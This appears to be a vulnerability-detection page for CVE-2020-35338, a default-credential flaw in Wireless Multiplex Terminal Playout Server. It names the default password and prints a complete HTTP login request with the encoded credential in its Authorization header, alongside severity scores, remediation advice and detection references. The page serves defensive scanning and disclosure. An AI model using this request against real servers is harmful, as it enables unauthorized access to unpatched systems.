🔙 목록으로 돌아가기

CVE-2020-35338: Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection

TitleWireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection
AuthorJeya Seelan
SeverityCritical
ImpactAn attacker can exploit this vulnerability to gain unauthorized access to the server.
RemediationChange the default credentials to strong and unique ones.
CVSS Score9.8
EPSS Score0.79871
CVE IDCVE-2020-35338
CWE IDCWE-798
Tags cve cve2020 wmt default-login mobileviewpoint vuln

🔍 Vulnerability Description

Wireless Multiplex Terminal Playout Server <=20.2.8 has a default account with a password of pokon available via its web administrative interface.

🌐 HTTP Request

GET /server/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic OnBva29u
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-35338.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-35338.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A